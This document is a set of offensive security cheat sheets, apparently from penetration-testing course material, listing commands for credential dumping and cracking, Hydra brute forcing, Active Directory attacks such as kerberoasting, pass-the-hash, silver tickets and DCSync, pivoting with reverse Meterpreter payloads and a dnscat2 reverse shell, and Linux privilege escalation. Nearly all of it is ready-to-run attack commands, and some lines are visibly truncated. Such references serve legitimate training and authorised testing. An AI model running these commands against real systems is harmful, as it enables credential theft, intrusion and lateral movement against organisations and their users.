python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Uses Secretsdump.py to dump password hashes from the SAM database.
vssadmin CREATE SHADOW /For=C: Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely.
cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of C:.

Linux Local Password Attacks

Command Description
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null grep -v "lib
for i in $(find / -name *.cnf 2>/dev/null grep -v "doc
for l in $(echo ".sql .db .db .db");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null grep -v "doc
find /home/ -type f -name ".txt" -o ! -name "." Uses Linux-based find command to search for text files.
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null grep -v "doc
for ext in $(echo ".xls .xls .xltx .csv .od .doc .doc .pdf .pot .pot .pp");do echo -e "\nFile extension: " $ext; find / -name $ext 2>/dev/null grep -v "lib
cat /etc/crontab Uses Linux-based cat command to view the contents of crontab in search for credentials.
ls -la /etc/cron.*/ Uses Linux-based ls -la command to list all files that start with cron contained in the etc directory.
grep -rnw "PRIVATE KEY" /* 2>/dev/null grep ":1"
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null grep ":1"
grep -rnw "ssh-rsa" /home/* 2>/dev/null grep ":1"
tail -n5 /home//.bash Uses Linux-based tail command to search the through bash history files and output the last 5 lines.
python3 mimipenguin.py Runs Mimipenguin.py using python3.
bash mimipenguin.sh Runs Mimipenguin.sh using bash.
python2.7 lazagne.py all Runs Lazagne.py with all modules using python2.7
ls -l .mozilla/firefox/ grep default
cat .mozilla/firefox/1bplpd86.default-release/logins.json jq .
python3.9 firefox_decrypt.py Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.
python3 lazagne.py browsers Runs Lazagne.py browsers module using Python 3.

Cracking Passwords

Command Description
hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt Uses Hashcat to crack NTLM hashes using a specified wordlist.
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output.
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking.
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked.
hashcat -m 500 -a 0 md5-hashes.list rockyou.txt Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file.
hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked.
ssh2john.pl SSH.private > ssh.hash Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.
john ssh.hash --show Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal.
office2john.py Protected.docx > protected-docx.hash Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.
john --wordlist=rockyou.txt protected-docx.hash Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash.
pdf2john.pl PDF.pdf > pdf.hash Runs Pdf2john.pl script to convert a pdf file to a pdf has to be cracked.
john --wordlist=rockyou.txt pdf.hash Runs John in conjunction with a wordlist to crack a pdf hash.
zip2john ZIP.zip > zip.hash Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash.
john --wordlist=rockyou.txt zip.hash Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.
bitlocker2john -i Backup.vhd > backup.hashes Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.
file GZIP.gzip Uses the Linux-based file tool to gather file format information.
for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null tar xz;done

Hydra

Command Description
hydra -h hydra help
hydra -C wordlist.txt SERVER_IP -s PORT http-get / Basic Auth Brute Force - Combined Wordlist
hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / Basic Auth Brute Force - User/Pass Wordlists
hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" Login Form Brute Force - Static User, Pass Wordlist
hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4 SSH Brute Force - User/Pass Wordlists
hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1 FTP Brute Force - Static User, Pass Wordlist

Wordlists

Command Description
/opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt Default Passwords Wordlist
/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt Common Passwords Wordlist
/opt/useful/SecLists/Usernames/Names/names.txt Common Names Wordlist

Misc

Command Description
cupp -i Creating Custom Password Wordlist
sed -ri '/^.{,7}$/d' william.txt Remove Passwords Shorter Than 8
sed -ri '/[!-/:-@[-`{-~]+/!d' william.txt Remove Passwords With No Special Chars
sed -ri '/[0-9]+/!d' william.txt Remove Passwords With No Numbers
./username-anarchy Bill Gates > bill.txt Generate Usernames List
ssh b.gates@SERVER_IP -p PORT SSH to Server
ftp 127.0.0.1 FTP to Server
su - user Switch to User

Active Directory Cheatsheet

Penetration testing and network exploitation involve a wide array of tools and techniques designed to assess and improve the security of computer systems. These tools help identify vulnerabilities, validate user credentials, and simulate attacks to test defenses. From enumerating network shares and users to exploiting weaknesses in authentication protocols like Kerberos, each tool serves a specific purpose in the broader strategy of ethical hacking. This collection of commands and tools provides a comprehensive overview of the methods used to enumerate systems, manage credentials, gain remote access, and escalate privileges, ultimately aiding in the detection and mitigation of security threats. Below are organized tables detailing these tools and their applications.

The process should go as follows:

1- get users (userenum, kerbrute)

2- get passwords/hashes (ASRep, Password Spraying, NTLM Stealing, Cracking or relaying) to connect or pass the hash or overpass the hash (if no NTLM auth and GUI) or perform DCSync

3- get service account password/hashes/ticket (kerberoasting(TGSRep), silver ticket) to pass the hash or pass the ticket

4- get DA password/hashes (mimikatz, golden ticket) to connect or have full persistence with golden ticket or shadow copies

more commands on: WADComs

Enumeration Tools

Tool/Command Description
enum4linux $IP Enumerate SMB shares and users on the target IP.
crackmapexec smb --pass-pol $IP Check password policy on the target SMB server.
crackmapexec smb $IP --shares List available SMB shares on the target IP.
crackmapexec smb $IP -M spider_plus Run Spider Plus module on the target SMB server.
smbmap -u invalid -H $IP Attempt to connect to SMB shares with an invalid user.
ldapsearch -H ldap://$IP -x -b "dc=domain,dc=local" Perform LDAP enumeration on the target domain.

Username Validation and Password Spraying

Tool/Command Description
kerbrute_linux_amd64 userenum -d domain.local --dc $IP users.txt Enumerate valid usernames in the domain.
kerbrute_linux_amd64 passwordspray -d domain.local --dc $IP users.txt 'S3cret' Spray a common password across the enumerated usernames.
kerbrute_linux_amd64 bruteforce -d domain.local --dc $IP creds.txt Perform brute-force attacks using a list of credentials.
crackmapexec smb $IP -u users.txt -p 'S3cret' Attempt to login to SMB with a list of users and a single password.
crackmapexec smb $IP -u users.txt -p passwords.txt Attempt to login to SMB with a list of users and multiple passwords.

LLMNR/NTB-NS Poisoning Tools

Tool/Command Description
crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=filename SERVER=IP_RESPONDER Create a malicious SCF file to capture NTLM hashes via SMB.
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=filename SERVER=IP_RESPONDER Create a malicious LNK file to capture NTLM hashes via SMB.
responder -I tun0 -wv Run Responder to capture NTLM hashes by poisoning LLMNR and NTB-NS requests.
\\\test Trigger authentication by accessing a UNC path, relaying the NTLM hash to a target machine.

Tools for Use with Credentials

Tool/Command Description
crackmapexec ldap $IP -u user -p P4ssword --password-not-required --admin-count --users --groups Enumerate LDAP with credentials, focusing on admin users and groups.
enum4linux -u user -p P4ssword -a $IP Perform detailed SMB enumeration with credentials.
crackmapexec smb $IP -u user -p P4ssword Connect to SMB server with credentials.
crackmapexec smb $IP -u user -p P4ssword --shares List SMB shares accessible with credentials.
crackmapexec smb $IP -u user -p P4ssword -M spider_plus Run Spider Plus module with credentials.

Kerberos and Ticket Management

Tool/Command Description
impacket-getTGT domain.local/user:P4ssword Obtain a Kerberos ticket for the user.
export KRB5CCNAME=ksimpson.ccache Set environment variable for the Kerberos ticket cache.
klist List cached Kerberos tickets.
impacket-GetNPUsers -dc-ip $IP -no-pass -usersfile users.txt domain.local/ Perform AS-REP Roasting attack.
impacket-GetUserSPNs -request -dc-ip $IP domain.local/user Perform Kerberoasting attack.

Remote Access and Execution

Tool/Command Description
impacket-psexec domain.local/user:P4ssword@$IP Execute commands remotely via SMB.
crackmapexec winrm $IP -u user -p P4ssword Connect to WinRM with credentials.
evil-winrm -i $IP -u user -p P4ssword Connect to WinRM with credentials using Evil-WinRM.
crackmapexec rdp $IP -u user -p P4ssword Connect to RDP with credentials.
rdesktop -u user -p P4ssword -d domain.local $IP -r disk:tools=/home/kali/tools -r clipboard:PRIMARYCLIPBOARD Connect to RDP with credentials and mount tools.

Password Dumping and Hash Management

Tool/Command Description
impacket-secretsdump -just-dc domain.local/user:P4ssword@$IP Dump NTDS hashes from the domain controller.
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL Dump local SAM, SYSTEM, and SECURITY files.
crackmapexec smb $IP -u user -p P4ssword --ntds Dump NTDS hashes via SMB.

Bloodhound and Network Visualization

Tool/Command Description
bloodhound-python -d domain.local -u user -p P4ssword -ns $IP -c all Collect data for Bloodhound network visualization.

Pass-the-Hash Attacks

Tool/Command Description
crackmapexec smb $IP -u administrator -H 'LMHASH:NTHASH' --local-auth Perform SMB login using pass-the-hash.
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@$IP Execute commands via SMB using pass-the-hash.
crackmapexec winrm $IP -u administrator -H 'LMHASH:NTHASH' --local-auth Connect to WinRM using pass-the-hash.
evil-winrm -i $IP -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 Connect to WinRM using pass-the-hash with Evil-WinRM.

Silver Ticket and Other Advanced Attacks

Tool/Command Description
impacket-getPac -targetUser administrator domain.local/user:P4ssword Obtain a PAC for creating a Silver Ticket.
impacket-ticketer -spn MSSQLSvc/dc1.domain.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain domain.local Create a Silver Ticket for a service.
impacket-mssqlclient -k dc1.domain.local Connect to MSSQL using a Silver Ticket.

Local Privilege Escalation and Shell Management

Tool/Command Description
.\mimikatz.exe "privilege::debug" "token::elevate" "log hashes.txt" "sekurlsa::tickets" "sekurlsa::logonpasswords" "lsadump::sam" "exit" Elevate privileges, log tickets, and dump SAM hashes using Mimikatz.
.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" "exit" Perform DCSync attack to dump domain hashes.
.\mimikatz.exe "kerberos::list /export" "exit" List and export Kerberos tickets.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 Enable WDigest for password capture.

Kerberos Ticket Management

Tool/Command Description
.\mimikatz.exe "privilege::debug" "kerberos::ptt 0-2-0-40e10000-Administrator@krbtgt-HACKER.TESTLAB.kirbi" "exit" Pass-the-ticket using a .kirbi file.

Bloodhound and Network Visualization

Tool/Command Description
.\SharpHound.exe -c all Collect data for Bloodhound network visualization.

Additional Tools and Commands

Tool/Command Description
net rpc password target_user -U pwned_user -S $IP Change a user's password using RPC.
sudo ntpdate $IP Synchronize time with the target server.

Pivot Network Cheatsheet

Pivoting and tunneling are crucial techniques used in network security testing and penetration testing to access and navigate through internal networks that are not directly reachable from the outside. Pivoting involves using a compromised host as a pivot point to move laterally within a network, bypassing segmentation and accessing previously isolated systems. This method is essential for expanding the attack surface and discovering new targets within a network. Tunneling, on the other hand, is a subset of pivoting that encapsulates network traffic within another protocol, allowing it to traverse restricted networks undetected. Common tunneling methods include SSH tunneling, which uses encrypted connections to relay traffic, and SOCKS proxies, which route traffic through a compromised host. Both techniques are vital for red team engagements and penetration tests, enabling testers to simulate real-world attacks and assess network vulnerabilities effectively.

Tunneling and Pivoting

Command Description
ifconfig Linux-based command that displays all current network configurations of a system.
ipconfig Windows-based command that displays all system network configurations.
netstat -r Command used to display the routing table for all IPv4-based protocols.
nmap -sT -p22,3306 Nmap command used to scan a target for open ports allowing SSH or MySQL connections.
ssh -L 1234:localhost:3306 Ubuntu@ SSH comand used to create an SSH tunnel from a local machine on local port 1234 to a remote target using port 3306.
netstat -antp grep 1234
nmap -v -sV -p1234 localhost Nmap command used to scan a host through a connection that has been made on local port 1234.
ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@ SSH command that instructs the ssh client to request the SSH server forward all data via port 1234 to localhost:3306.
ssh -D 9050 ubuntu@ SSH command used to perform a dynamic port forward on port 9050 and establishes an SSH tunnel with the target. This is part of setting up a SOCKS proxy.
tail -4 /etc/proxychains.conf Linux-based command used to display the last 4 lines of /etc/proxychains.conf. Can be used to ensure socks configurations are in place.
proxychains nmap -v -sn 172.16.5.1-200 Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against the hosts in the specified range 172.16.5.1-200 with increased verbosity (-v) disabling ping scan (-sn).
proxychains nmap -v -Pn -sT 172.16.5.19 Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against 172.16.5.19 with increased verbosity (-v), disabling ping discover (-Pn), and using TCP connect scan type (-sT).
proxychains msfconsole Uses Proxychains to open Metasploit and send all generated network traffic through a SOCKS proxy.
msf6 > search rdp_scanner Metasploit search that attempts to find a module called rdp_scanner.
proxychains xfreerdp /v: /u:victor /p:pass@123 Used to connect to a target using RDP and a set of credentials using proxychains. This will send all traffic through a SOCKS proxy.
msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 Uses msfvenom to generate a Windows-based reverse HTTPS Meterpreter payload that will send a call back to the IP address specified following lhost= on local port 8080 (LPORT=8080). Payload will take the form of an executable file called backupscript.exe.
msf6 > use exploit/multi/handler Used to select the multi-handler exploit module in Metasploit.
scp backupscript.exe ubuntu@:~/ Uses secure copy protocol (scp) to transfer the file backupscript.exe to the specified host and places it in the Ubuntu user's home directory (:~/).
python3 -m http.server 8123 Uses Python3 to start a simple HTTP server listening on port 8123. Can be used to retrieve files from a host.
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" PowerShell command used to download a file called backupscript.exe from a webserver (172.16.5.129:8123) and then save the file to location specified after -OutFile.
ssh -R :8080:0.0.0.0:80 ubuntu@ -vN SSH command used to create a reverse SSH tunnel from a target to an attack host. Traffic is forwarded on port 8080 on the attack host to port 80 on the target.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost -f elf -o backupjob LPORT=8080 Uses msfveom to generate a Linux-based Meterpreter reverse TCP payload that calls back to the IP specified after LHOST= on port 8080 (LPORT=8080). Payload takes the form of an executable elf file called backupjob.
msf6> run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 Metasploit command that runs a ping sweep module against the specified network segment (RHOSTS=172.16.5.0/23).
for i in {1..254} ;do (ping -c 1 172.16.5.$i grep "bytes from" &) ;done
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 find "Reply"
1..254 % {"172.16.5.$($): $(Test-Connection -count 1 -comp 172.15.5.$($) -quiet)"}
msf6 > use auxiliary/server/socks_proxy Metasploit command that selects the socks_proxy auxiliary module.
msf6 auxiliary(server/socks_proxy) > jobs Metasploit command that lists all currently running jobs.
socks4 127.0.0.1 9050 Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 4 proxy is used in combination with proxychains on the specified IP address and port.
Socks5 127.0.0.1 1080 Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 5 proxy is used in combination with proxychains on the specified IP address and port.
msf6 > use post/multi/manage/autoroute Metasploit command used to select the autoroute module.
meterpreter > help portfwd Meterpreter command used to display the features of the portfwd command.
meterpreter > portfwd add -l 3300 -p 3389 -r Meterpreter-based portfwd command that adds a forwarding rule to the current Meterpreter session. This rule forwards network traffic on port 3300 on the local machine to port 3389 (RDP) on the target.
xfreerdp /v:localhost:3300 /u:victor /p:pass@123 Uses xfreerdp to connect to a remote host through localhost:3300 using a set of credentials. Port forwarding rules must be in place for this to work properly.
netstat -antp Used to display all (-a) active network connections with associated process IDs. -t displays only TCP connections.-n displays only numerical addresses. -p displays process IDs associated with each displayed connection.
meterpreter > portfwd add -R -l 8081 -p 1234 -L Meterpreter-based portfwd command that adds a forwarding rule that directs traffic coming on on port 8081 to the port 1234 listening on the IP address of the Attack Host.
meterpreter > bg Meterpreter-based command used to run the selected metepreter session in the background. Similar to background a process in Linux
socat TCP4-LISTEN:8080,fork TCP4::80 Uses Socat to listen on port 8080 and then to fork when the connection is received. It will then connect to the attack host on port 80.
socat TCP4-LISTEN:8080,fork TCP4::8443 Uses Socat to listen on port 8080 and then to fork when the connection is received. Then it will connect to the target host on port 8443.
plink -D 9050 ubuntu@ Windows-based command that uses PuTTY's Plink.exe to perform SSH dynamic port forwarding and establishes an SSH tunnel with the specified target. This will allow for proxy chaining on a Windows host, similar to what is done with Proxychains on a Linux-based host.
sudo apt-get install sshuttle Uses apt-get to install the tool sshuttle.
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0 -v Runs sshuttle, connects to the target host, and creates a route to the 172.16.5.0 network so traffic can pass from the attack host to hosts on the internal network (172.16.5.0).
sudo git clone https://github.com/klsecservices/rpivot.git Clones the rpivot project GitHub repository.
sudo apt-get install python2.7 Uses apt-get to install python2.7.
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 Used to run the rpivot server (server.py) on proxy port 9050, server port 9999 and listening on any IP address (0.0.0.0).
scp -r rpivot ubuntu@ Uses secure copy protocol to transfer an entire directory and all of its contents to a specified target.
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 Used to run the rpivot client (client.py) to connect to the specified rpivot server on the appropriate port.
proxychains firefox-esr :80 Opens firefox with Proxychains and sends the web request through a SOCKS proxy server to the specified destination web server.
python client.py --server-ip --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain --username --password Use to run the rpivot client to connect to a web server that is using HTTP-Proxy with NTLM authentication.
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25 Windows-based command that uses netsh.exe to configure a portproxy rule called  v4tov4 that listens on port 8080 and forwards connections to the destination 172.16.5.25 on port 3389.
netsh.exe interface portproxy show v4tov4 Windows-based command used to view the configurations of a portproxy rule called v4tov4.
git clone https://github.com/iagox86/dnscat2.git Clones the dnscat2 project GitHub repository.
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache Used to start the dnscat2.rb server running on the specified IP address, port (53) & using the domain inlanefreight.local with the no-cache option enabled.
git clone https://github.com/lukebaggett/dnscat2-powershell.git Clones the dnscat2-powershell project Github repository.
Import-Module dnscat2.ps1 PowerShell command used to import the dnscat2.ps1 tool.
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd PowerShell command used to connect to a specified dnscat2 server using a IP address, domain name and preshared secret. The client will send back a shell connection to the server (-Exec cmd).
dnscat2> ? Used to list dnscat2 options.
dnscat2> window -i 1 Used to interact with an established dnscat2 session.
./chisel server -v -p 1234 --socks5 Used to start a chisel server in verbose mode listening on port 1234 using SOCKS version 5.
./chisel client -v 10.129.202.64:1234 socks Used to connect to a chisel server at the specified IP address & port using socks.
git clone https://github.com/utoni/ptunnel-ng.git Clones the ptunnel-ng project GitHub repository.
sudo ./autogen.sh Used to run the autogen.sh shell script that will build the necessary ptunnel-ng files.
sudo ./ptunnel-ng -r10.129.202.64 -R22 Used to start the ptunnel-ng server on the specified IP address (-r) and corresponding port (-R22).
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 Used to connect to a specified ptunnel-ng server through local port 2222 (-l2222).
ssh -p2222 -lubuntu 127.0.0.1 SSH command used to connect to an SSH server through a local port. This can be used to tunnel SSH traffic through an ICMP tunnel.
regsvr32.exe SocksOverRDP-Plugin.dll Windows-based command used to register the SocksOverRDP-PLugin.dll.
netstat -antb findstr 1080

Linux Privilege Escalation Cheatsheet

Linux privilege escalation is a critical security concern that involves exploiting vulnerabilities or misconfigurations to gain elevated access to a system. This technique can be used both by authorized users to perform administrative tasks and by attackers to compromise a system's security. Authorized users typically use tools like sudo to temporarily elevate their privileges for specific tasks, such as system configuration or software installation. However, attackers exploit weaknesses in the system, such as kernel vulnerabilities, misconfigured services, or file permissions, to escalate their privileges from a limited user account to the powerful root account. This can lead to severe consequences, including data theft, malware deployment, and system damage. Understanding the methods of privilege escalation is essential for both ethical hackers and system administrators to enhance security and prevent unauthorized access.

Linux

Command Description
ssh htb-student@ SSH to lab target
ps aux grep root
ps au See logged in users
ls /home View user home directories
ls -l ~/.ssh Check for SSH keys for current user
history Check the current user's Bash history
sudo -l Can the user run anything as another user?
ls -la /etc/cron.daily Check for daily Cron jobs
lsblk Check for unmounted file systems/drives
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null Find world-writeable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null Find world-writeable files
uname -a Check the Kernel versiion
cat /etc/lsb-release Check the OS version
gcc kernel_expoit.c -o kernel_expoit Compile an exploit written in C
screen -v Check the installed version of Screen
./pspy64 -pf -i 1000 View running processes with pspy
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null Find binaries with the SUID bit set
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null Find binaries with the SETGID bit set
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root Priv esc with tcpdump
echo $PATH Check the current user's PATH variable contents
PATH=.:${PATH} Add a . to the beginning of the current user's PATH
find / ! -path "/proc/" -iname "config" -type f 2>/dev/null Search for config files
ldd /bin/ls View the shared objects required by a binary
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart Escalate privileges using LD_PRELOAD
readelf -d payroll grep PATH
gcc src.c -fPIC -shared -o /development/libshared.so Compiled a shared libary
lxd init Start the LXD initialization process
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine Import a local image
lxc init alpine r00t -c security.privileged=true Start a privileged LXD container
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true Mount the host file system in a container
lxc start r00t Start the container
showmount -e 10.129.2.12 Show the NFS export list
sudo mount -t nfs 10.129.2.12:/tmp /mnt Mount an NFS share locally
tmux -S /shareds new -s debugsess Created a shared tmux session socket
./lynis audit system Perform a system audit with Lynis